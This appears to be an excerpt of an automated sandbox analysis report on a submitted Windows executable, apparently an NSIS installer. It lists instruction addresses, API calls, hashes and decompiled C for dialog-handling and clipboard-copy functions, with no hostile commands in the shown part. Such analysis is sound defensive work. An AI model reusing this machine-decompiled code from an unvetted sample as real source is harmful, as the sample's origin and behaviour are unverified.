                                                            0x004056c5
                                                            0x0040571a
                                                            0x0040571d
                                                            0x00000000
                                                            0x00000000
                                                            0x0040571f
                                                            0x00405725
                                                            0x00000000
                                                            0x00000000
                                                            0x0040572f
                                                            0x00405737
                                                            0x0040573a
                                                            0x00405837
                                                            0x00000000
                                                            0x00405837
                                                            0x00405749
                                                            0x00405755
                                                            0x0040575e
                                                            0x00405769
                                                            0x0040576c
                                                            0x00405775
                                                            0x0040577b
                                                            0x0040577e
                                                            0x0040577e
                                                            0x00405797
                                                            0x004057a2
                                                            0x004057a3
                                                            0x004057a6
                                                            0x004057ad
                                                            0x004057b4
                                                            0x004057bc
                                                            0x004057bc
                                                            0x004057d3
                                                            0x004057d3
                                                            0x004057da
                                                            0x004057e0
                                                            0x004057e9
                                                            0x004057f0
                                                            0x004057f9
                                                            0x004057fb
                                                            0x004057fe
                                                            0x0040580d
                                                            0x0040580f
                                                            0x00405812
                                                            0x00405813
                                                            0x00405816
                                                            0x00405817
                                                            0x00405818
                                                            0x00405820
                                                            0x0040582b
                                                            0x00405831
                                                            0x00405831
                                                            0x00000000
                                                            0x00405797
                                                            0x004056cd
                                                            0x004056fb
                                                            0x00405703
                                                            0x00405705
                                                            0x0040570e
                                                            0x0040570e
                                                            0x00405715
                                                            0x00000000
                                                            0x00405715
                                                            0x004056d1
                                                            0x004056db
                                                            0x00000000
                                                            0x0040569f
                                                            0x004056a5
                                                            0x004056e0
                                                            0x00000000
                                                            0x004056e7
                                                            0x004056ae
                                                            0x004056b5
                                                            0x004056ba
                                                            0x00000000
                                                            0x004056ba
                                                            0x0040569d
                                                            0x004054d8
                                                            0x004054dc
                                                            0x004054e4
                                                            0x004054e8
                                                            0x004054eb
                                                            0x004054ee
                                                            0x004054f1
                                                            0x004054f4
                                                            0x004054f5
                                                            0x004054f6
                                                            0x0040550f
                                                            0x00405512
                                                            0x0040551c
                                                            0x0040552b
                                                            0x00405533
                                                            0x0040553b
                                                            0x00405540
                                                            0x00405543
                                                            0x0040554f
                                                            0x00405558
                                                            0x00405561
                                                            0x00405583
                                                            0x00405589
                                                            0x0040559a
                                                            0x0040559f
                                                            0x004055ad
                                                            0x004055bb
                                                            0x004055bb
                                                            0x004055c0
                                                            0x004055ce
                                                            0x004055ce
                                                            0x004055d3
                                                            0x004055d6
                                                            0x004055db
                                                            0x004055e7
                                                            0x004055f0
                                                            0x004055fd
                                                            0x0040560c
                                                            0x004055ff
                                                            0x00405604
                                                            0x00405604
                                                            0x00405618
                                                            0x00405618
                                                            0x0040562c
                                                            0x00405635
                                                            0x0040563e
                                                            0x0040564e
                                                            0x0040565a
                                                            0x0040565a
                                                            0x00000000

                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 00405515
                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405524
                                                            • GetClientRect.USER32 ref: 00405561
                                                            • GetSystemMetrics.USER32 ref: 00405568
                                                            • SendMessageA.USER32 ref: 00405589
                                                            • SendMessageA.USER32 ref: 0040559A
                                                            • SendMessageA.USER32 ref: 004055AD
                                                            • SendMessageA.USER32 ref: 004055BB
                                                            • SendMessageA.USER32 ref: 004055CE
                                                            • ShowWindow.USER32(00000000,?), ref: 004055F0
                                                            • ShowWindow.USER32(?,00000008), ref: 00405604
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405625
                                                            • SendMessageA.USER32 ref: 00405635
                                                            • SendMessageA.USER32 ref: 0040564E
                                                            • SendMessageA.USER32 ref: 0040565A
                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405533
                                                              • Part of subcall function 00404309: SendMessageA.USER32 ref: 00404317
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405676
                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_0000544A,00000000), ref: 00405684
                                                            • CloseHandle.KERNELBASE(00000000), ref: 0040568B
                                                            • ShowWindow.USER32(00000000), ref: 004056AE
                                                            • ShowWindow.USER32(?,00000008), ref: 004056B5
                                                            • ShowWindow.USER32(00000008), ref: 004056FB
                                                            • SendMessageA.USER32 ref: 0040572F
                                                            • CreatePopupMenu.USER32 ref: 00405740
                                                            • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405755
                                                            • GetWindowRect.USER32(?,000000FF), ref: 00405775
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578E
                                                            • SendMessageA.USER32 ref: 004057CA
                                                            • OpenClipboard.USER32(00000000), ref: 004057DA
                                                            • EmptyClipboard.USER32 ref: 004057E0
                                                            • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E9
                                                            • GlobalLock.KERNEL32 ref: 004057F3
                                                            • SendMessageA.USER32 ref: 00405807
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405820
                                                            • SetClipboardData.USER32 ref: 0040582B
                                                            • CloseClipboard.USER32 ref: 00405831
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID:
                                                            • API String ID: 590372296-0
                                                            • Opcode ID: 746edb2a2778025f9de9b77bb3992fa6aedd30c2e25b648fc8e79c3d49393592
                                                            • Instruction ID: a29ac8d60da1fb34f4aa2469bcdf397c87ff466403413f05bd0ae09002c56f5c
                                                            • Opcode Fuzzy Hash: 746edb2a2778025f9de9b77bb3992fa6aedd30c2e25b648fc8e79c3d49393592
                                                            • Instruction Fuzzy Hash: 7BA16BB1900608BFEB119F64DE89EAE7B79FB08354F00403AFA45B61A1CB754E51DF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403DDA Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 195 403dda-403dec 196 403df2-403df8 195->196 197 403f53-403f62 195->197 196->197 200 403dfe-403e07 196->200 198 403fb1-403fc6 197->198 199 403f64-403fac GetDlgItem * 2 call 4042d4 SetClassLongA call 40140b 197->199 202 404006-40400b call 404320 198->202 203 403fc8-403fcb 198->203 199->198 204 403e09-403e16 SetWindowPos 200->204 205 403e1c-403e23 200->205 219 404010-40402b 202->219 209 403fcd-403fd8 call 401389 203->209 210 403ffe-404000 203->210 204->205 206 403e25-403e3f ShowWindow 205->206 207 403e67-403e6d 205->207 212 403f40-403f4e call 40433b 206->212 213 403e45-403e58 GetWindowLongA 206->213 214 403e86-403e89 207->214 215 403e6f-403e81 DestroyWindow 207->215 209->210 235 403fda-403ff9 SendMessageA 209->235 210->202 218 4042a1 210->218 225 4042a3-4042aa 212->225 213->212 222 403e5e-403e61 ShowWindow 213->222 226 403e8b-403e97 SetWindowLongA 214->226 227 403e9c-403ea2 214->227 223 40427e-404284 215->223 218->225 220 404034-40403a 219->220 221 40402d-40402f call 40140b 219->221 232 404040-40404b 220->232 233 40425f-404278 DestroyWindow EndDialog 220->233 221->220 222->207 223->218 231 404286-40428c 223->231 226->225 227->212 234 403ea8-403eb7 GetDlgItem 227->234 231->218 237 40428e-404297 ShowWindow 231->237 232->233 238 404051-40409e call 4062ea call 4042d4 * 3 GetDlgItem 232->238 233->223 239 403ed6-403ed9 234->239 240 403eb9-403ed0 SendMessageA IsWindowEnabled 234->240 235->225 237->218 267 4040a0-4040a5 238->267 268 4040a8-4040e4 ShowWindow KiUserCallbackDispatcher call 4042f6 EnableWindow 238->268 242 403edb-403edc 239->242 243 403ede-403ee1 239->243 240->218 240->239 245 403f0c-403f11 call 4042ad 242->245 246 403ee3-403ee9 243->246 247 403eef-403ef4 243->247 245->212 249 403f2a-403f3a SendMessageA 246->249 252 403eeb-403eed 246->252 248 403ef6-403efc 247->248 247->249 253 403f13-403f1c call 40140b 248->253 254 403efe-403f04 call 40140b 248->254 249->212 252->245 253->212 264 403f1e-403f28 253->264 263 403f0a 254->263 263->245 264->263 267->268 271 4040e6-4040e7 268->271 272 4040e9 268->272 273 4040eb-404119 GetSystemMenu EnableMenuItem SendMessageA 271->273 272->273 274 40411b-40412c SendMessageA 273->274 275 40412e 273->275 276 404134-40416e call 404309 call 403dbb call 406257 lstrlenA call 4062ea SetWindowTextA call 401389 274->276 275->276 276->219 287 404174-404176 276->287 287->219 288 40417c-404180 287->288 289 404182-404188 288->289 290 40419f-4041b3 DestroyWindow 288->290 289->218 291 40418e-404194 289->291 290->223 292 4041b9-4041e6 CreateDialogParamA 290->292 291->219 293 40419a 291->293 292->223 294 4041ec-404243 call 4042d4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 292->294 293->218 294->218 299 404245-404258 ShowWindow call 404320 294->299 301 40425d 299->301 301->223
                                                            C-Code - Quality: 84%
                                                            			E00403DDA(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				signed int _t36;
				struct HWND__* _t46;
				signed int _t65;
				struct HWND__* _t71;
				signed int _t84;
				struct HWND__* _t89;
				signed int _t97;
				int _t101;
				signed int _t115;
				int _t116;
				int _t120;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				intOrPtr _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;

				_t128 = _a8;
				if(_t128 == 0x110 || _t128 == 0x408) {
					_t32 = _a12;
					_t125 = _a4;
					__eflags = _t128 - 0x110;
					 *0x43c078 = _t32;
					if(_t128 == 0x110) {
						 *0x452428 = _t125;
						 *0x43c08c = GetDlgItem(_t125, 1);
						_t89 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x434058 = _t89;
						E004042D4(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x44e408);
						 *0x44e3ec = E0040140B(4);
						_t32 = 1;
						__eflags = 1;
						 *0x43c078 = 1;
					}
					_t122 =  *0x40a1dc; // 0x0
					_t134 = 0;
					_t131 = (_t122 << 6) +  *0x452440;
					__eflags = _t122;
					if(_t122 < 0) {
						L36:
						E00404320(0x40b);
						while(1) {
							_t34 =  *0x43c078;
							 *0x40a1dc =  *0x40a1dc + _t34;
							_t131 = _t131 + (_t34 << 6);
							_t36 =  *0x40a1dc; // 0x0
							__eflags = _t36 -  *0x452444;
							if(_t36 ==  *0x452444) {
								E0040140B(1);
							}
							__eflags =  *0x44e3ec - _t134;
							if( *0x44e3ec != _t134) {
								break;
							}
							__eflags =  *0x40a1dc -  *0x452444; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t115 =  *(_t131 + 0x14);
							E004062EA(_t115, _t125, _t131, 0x48f000,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042D4(_t125);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042D4(_t125);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042D4(_t125);
							_t46 = GetDlgItem(_t125, 3);
							__eflags =  *0x4524ac - _t134;
							_v28 = _t46;
							if( *0x4524ac != _t134) {
								_t115 = _t115 & 0x0000fefd | 0x00000004;
								__eflags = _t115;
							}
							ShowWindow(_t46, _t115 & 0x00000008); // executed
							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
							E004042F6(_t115 & 0x00000002);
							_t116 = _t115 & 0x00000004;
							EnableWindow( *0x434058, _t116);
							__eflags = _t116 - _t134;
							if(_t116 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
							__eflags =  *0x4524ac - _t134;
							if( *0x4524ac == _t134) {
								_push( *0x43c08c);
							} else {
								SendMessageA(_t125, 0x401, 2, _t134);
								_push( *0x434058);
							}
							E00404309();
							E00406257(0x43c090, E00403DBB());
							E004062EA(0x43c090, _t125, _t131,  &(0x43c090[lstrlenA(0x43c090)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t125, 0x43c090); // executed
							_push(_t134);
							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
							__eflags = _t65;
							if(_t65 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x44e3f8); // executed
									 *0x438068 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L60;
									}
									_t71 = CreateDialogParamA( *0x452420,  *_t131 +  *0x44e400 & 0x0000ffff, _t125,  *( *(_t131 + 4) * 4 + "?D@"), _t131); // executed
									__eflags = _t71 - _t134;
									 *0x44e3f8 = _t71;
									if(_t71 == _t134) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042D4(_t71);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t125, _t135 + 0x10);
									SetWindowPos( *0x44e3f8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									_push(_t134);
									E00401389( *((intOrPtr*)(_t131 + 0xc)));
									__eflags =  *0x44e3ec - _t134;
									if( *0x44e3ec != _t134) {
										goto L63;
									}
									ShowWindow( *0x44e3f8, 8); // executed
									E00404320(0x405);
									goto L60;
								}
								__eflags =  *0x4524ac - _t134;
								if( *0x4524ac != _t134) {
									goto L63;
								}
								__eflags =  *0x4524a0 - _t134;
								if( *0x4524a0 != _t134) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x44e3f8);
						 *0x452428 = _t134;
						EndDialog(_t125,  *0x436060);
						goto L60;
					} else {
						__eflags = _t32 - 1;
						if(_t32 != 1) {
							L35:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
						__eflags = _t84;
						if(_t84 == 0) {
							goto L35;
						}
						SendMessageA( *0x44e3f8, 0x40f, 0, 1);
						__eflags =  *0x44e3ec;
						return 0 |  *0x44e3ec == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t134 = 0;
					if(_t128 == 0x47) {
						SetWindowPos( *0x43c070, _t125, 0, 0, 0, 0, 0x13);
					}
					_t120 = _a12;
					if(_t128 != 5) {
						L8:
						if(_t128 != 0x40d) {
							__eflags = _t128 - 0x11;
							if(_t128 != 0x11) {
								__eflags = _t128 - 0x111;
								if(_t128 != 0x111) {
									goto L28;
								}
								_t133 = _t120 & 0x0000ffff;
								_t126 = GetDlgItem(_t125, _t133);
								__eflags = _t126 - _t134;
								if(_t126 == _t134) {
									L15:
									__eflags = _t133 - 1;
									if(_t133 != 1) {
										__eflags = _t133 - 3;
										if(_t133 != 3) {
											_t127 = 2;
											__eflags = _t133 - _t127;
											if(_t133 != _t127) {
												L27:
												SendMessageA( *0x44e3f8, 0x111, _t120, _a16);
												goto L28;
											}
											__eflags =  *0x4524ac - _t134;
											if( *0x4524ac == _t134) {
												_t97 = E0040140B(3);
												__eflags = _t97;
												if(_t97 != 0) {
													goto L28;
												}
												 *0x436060 = 1;
												L23:
												_push(0x78);
												L24:
												E004042AD();
												goto L28;
											}
											E0040140B(_t127);
											 *0x436060 = _t127;
											goto L23;
										}
										__eflags =  *0x40a1dc - _t134; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t133);
									goto L24;
								}
								SendMessageA(_t126, 0xf3, _t134, _t134);
								_t101 = IsWindowEnabled(_t126);
								__eflags = _t101;
								if(_t101 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongA(_t125, _t134, _t134);
							return 1;
						}
						DestroyWindow( *0x44e3f8);
						 *0x44e3f8 = _t120;
						L60:
						if( *0x444090 == _t134 &&  *0x44e3f8 != _t134) {
							ShowWindow(_t125, 0xa); // executed
							 *0x444090 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x43c070,  ~(_t120 - 1) & 0x00000005);
						if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040433B(_a8, _t120, _a16);
						} else {
							ShowWindow(_t125, 4);
							goto L8;
						}
					}
				}
			}































                                                            0x00403de5
                                                            0x00403dec
                                                            0x00403f53
                                                            0x00403f57
                                                            0x00403f5b
                                                            0x00403f5d
                                                            0x00403f62
                                                            0x00403f6d
                                                            0x00403f78
                                                            0x00403f7d
                                                            0x00403f7f
                                                            0x00403f81
                                                            0x00403f84
                                                            0x00403f89
                                                            0x00403f97
                                                            0x00403fa4
                                                            0x00403fab
                                                            0x00403fab
                                                            0x00403fac
                                                            0x00403fac
                                                            0x00403fb1
                                                            0x00403fb7
                                                            0x00403fbe
                                                            0x00403fc4
                                                            0x00403fc6
                                                            0x00404006
                                                            0x0040400b
                                                            0x00404010
                                                            0x00404010
                                                            0x00404015
                                                            0x0040401e
                                                            0x00404020
                                                            0x00404025
                                                            0x0040402b
                                                            0x0040402f
                                                            0x0040402f
                                                            0x00404034
                                                            0x0040403a
                                                            0x00000000
                                                            0x00000000
                                                            0x00404045
                                                            0x0040404b
                                                            0x00000000
                                                            0x00000000
                                                            0x00404054
                                                            0x0040405c
                                                            0x00404061
                                                            0x00404064
                                                            0x0040406a
                                                            0x0040406f
                                                            0x00404072
                                                            0x00404078
                                                            0x0040407d
                                                            0x00404080
                                                            0x00404086
                                                            0x0040408e
                                                            0x00404094
                                                            0x0040409a
                                                            0x0040409e
                                                            0x004040a5
                                                            0x004040a5
                                                            0x004040a5
                                                            0x004040af
                                                            0x004040c1
                                                            0x004040cd
                                                            0x004040d2
                                                            0x004040dc
                                                            0x004040e2
                                                            0x004040e4
                                                            0x004040e9
                                                            0x004040e6
                                                            0x004040e6
                                                            0x004040e6
                                                            0x004040f9
                                                            0x00404111
                                                            0x00404113
                                                            0x00404119
                                                            0x0040412e
                                                            0x0040411b
                                                            0x00404124
                                                            0x00404126
                                                            0x00404126
                                                            0x00404134
                                                            0x00404145
                                                            0x00404156
                                                            0x0040415d
                                                            0x00404163
                                                            0x00404167
                                                            0x0040416c
                                                            0x0040416e
                                                            0x00000000
                                                            0x00404174
                                                            0x00404174
                                                            0x00404176
                                                            0x00000000
                                                            0x00000000
                                                            0x0040417c
                                                            0x00404180
                                                            0x004041a5
                                                            0x004041ab
                                                            0x004041b1
                                                            0x004041b3
                                                            0x00000000
                                                            0x00000000
                                                            0x004041d9
                                                            0x004041df
                                                            0x004041e1
                                                            0x004041e6
                                                            0x00000000
                                                            0x00000000
                                                            0x004041ec
                                                            0x004041ef
                                                            0x004041f2
                                                            0x00404209
                                                            0x00404215
                                                            0x0040422e
                                                            0x00404234
                                                            0x00404238
                                                            0x0040423d
                                                            0x00404243
                                                            0x00000000
                                                            0x00000000
                                                            0x0040424d
                                                            0x00404258
                                                            0x00000000
                                                            0x00404258
                                                            0x00404182
                                                            0x00404188
                                                            0x00000000
                                                            0x00000000
                                                            0x0040418e
                                                            0x00404194
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040419a
                                                            0x0040416e
                                                            0x00404265
                                                            0x00404271
                                                            0x00404278
                                                            0x00000000
                                                            0x00403fc8
                                                            0x00403fc8
                                                            0x00403fcb
                                                            0x00403ffe
                                                            0x00403ffe
                                                            0x00404000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00404000
                                                            0x00403fcd
                                                            0x00403fd1
                                                            0x00403fd6
                                                            0x00403fd8
                                                            0x00000000
                                                            0x00000000
                                                            0x00403fe8
                                                            0x00403ff0
                                                            0x00000000
                                                            0x00403ff6
                                                            0x00403dfe
                                                            0x00403dfe
                                                            0x00403e02
                                                            0x00403e07
                                                            0x00403e16
                                                            0x00403e16
                                                            0x00403e1c
                                                            0x00403e23
                                                            0x00403e67
                                                            0x00403e6d
                                                            0x00403e86
                                                            0x00403e89
                                                            0x00403e9c
                                                            0x00403ea2
                                                            0x00000000
                                                            0x00000000
                                                            0x00403ea8
                                                            0x00403eb3
                                                            0x00403eb5
                                                            0x00403eb7
                                                            0x00403ed6
                                                            0x00403ed6
                                                            0x00403ed9
                                                            0x00403ede
                                                            0x00403ee1
                                                            0x00403ef1
                                                            0x00403ef2
                                                            0x00403ef4
                                                            0x00403f2a
                                                            0x00403f3a
                                                            0x00000000
                                                            0x00403f3a
                                                            0x00403ef6
                                                            0x00403efc
                                                            0x00403f15
                                                            0x00403f1a
                                                            0x00403f1c
                                                            0x00000000
                                                            0x00000000
                                                            0x00403f1e
                                                            0x00403f0a
                                                            0x00403f0a
                                                            0x00403f0c
                                                            0x00403f0c
                                                            0x00000000
                                                            0x00403f0c
                                                            0x00403eff
                                                            0x00403f04
                                                            0x00000000
                                                            0x00403f04
                                                            0x00403ee3
                                                            0x00403ee9
                                                            0x00000000
                                                            0x00000000
                                                            0x00403eeb
                                                            0x00000000
                                                            0x00403eeb
                                                            0x00403edb
                                                            0x00000000
                                                            0x00403edb
                                                            0x00403ec1
                                                            0x00403ec8
                                                            0x00403ece
                                                            0x00403ed0
                                                            0x004042a1
                                                            0x00000000
                                                            0x004042a1
                                                            0x00000000
                                                            0x00403ed0
                                                            0x00403e8e
                                                            0x00000000
                                                            0x00403e96
                                                            0x00403e75
                                                            0x00403e7b
                                                            0x0040427e
                                                            0x00404284
                                                            0x00404291
                                                            0x00404297
                                                            0x00404297
                                                            0x00000000
                                                            0x00403e25
                                                            0x00403e2a
                                                            0x00403e36
                                                            0x00403e3f
                                                            0x00403f40
                                                            0x00000000
                                                            0x00403e5e
                                                            0x00403e61
                                                            0x00000000
                                                            0x00403e61
                                                            0x00403e3f
                                                            0x00403e23

                                                            APIs
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                            • ShowWindow.USER32(?), ref: 00403E36
                                                            • GetWindowLongA.USER32(?,000000F0), ref: 00403E48
                                                            • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                            • DestroyWindow.USER32 ref: 00403E75
                                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403E8E
                                                            • GetDlgItem.USER32(?,?), ref: 00403EAD
                                                            • SendMessageA.USER32 ref: 00403EC1
                                                            • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                            • GetDlgItem.USER32(?,00000001), ref: 00403F73
                                                            • GetDlgItem.USER32(?,00000002), ref: 00403F7D
                                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403F97
                                                            • SendMessageA.USER32 ref: 00403FE8
                                                            • GetDlgItem.USER32(?,00000003), ref: 0040408E
                                                            • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                            • EnableWindow.USER32(?,?), ref: 004040DC
                                                            • GetSystemMenu.USER32 ref: 004040F2
                                                            • EnableMenuItem.USER32 ref: 004040F9
                                                            • SendMessageA.USER32 ref: 00404111
                                                            • SendMessageA.USER32 ref: 00404124
                                                            • lstrlenA.KERNEL32(0043C090,?,0043C090,00000000), ref: 0040414E
                                                            • SetWindowTextA.USER32(?,0043C090), ref: 0040415D
                                                            • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                            • String ID:
                                                            • API String ID: 121052019-0
                                                            • Opcode ID: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction ID: 1a69bbab5f1dc0e71ac1873d296b8d42e3e712d362af29a70bde279b026b61fc
                                                            • Opcode Fuzzy Hash: b673dabca76274c5076d0e044a6da74a23405ad17572b8bf379c5a70d32c39fe
                                                            • Instruction Fuzzy Hash: 35C1F471900205AFDB216F61EE85E2B3A78FB86749F01053EFA41B21F1CB3898519B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403A3D Relevance: 40.5, APIs: 13, Strings: 10, Instructions: 215stringregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
